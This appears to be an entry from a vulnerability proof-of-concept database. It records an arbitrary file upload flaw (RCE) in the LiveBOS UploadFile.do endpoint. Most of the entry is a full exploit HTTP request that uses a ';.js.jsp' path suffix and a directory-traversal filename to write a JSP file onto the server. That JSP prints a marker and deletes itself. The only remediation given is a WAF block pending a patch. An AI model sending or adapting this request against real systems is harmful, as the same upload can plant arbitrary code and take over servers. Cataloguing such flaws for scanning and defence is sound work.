vendor = "LiveBOS"
name = "LiveBOS接口UploadFile.do存在任意文件上传漏洞"
type = "RCE"
version = "未知"
path = "/feed/UploadFile.do"
detail = "POST /feed/UploadFile.do;.js.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi Connection: close ---WebKitFormBoundaryxegqoxxi Content-Disposition:form-data; name=\"file\"; filename=\"/../../../../rce.jsp\" Content-Type: image/jpeg <%@ page import=\"java.io.File\" %> <% out.println(\"asdasd\"); String filePath = application.getRealPath(request.getServletPath()); new File(filePath).delete(); %> ---WebKitFormBoundaryxegqoxxi--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
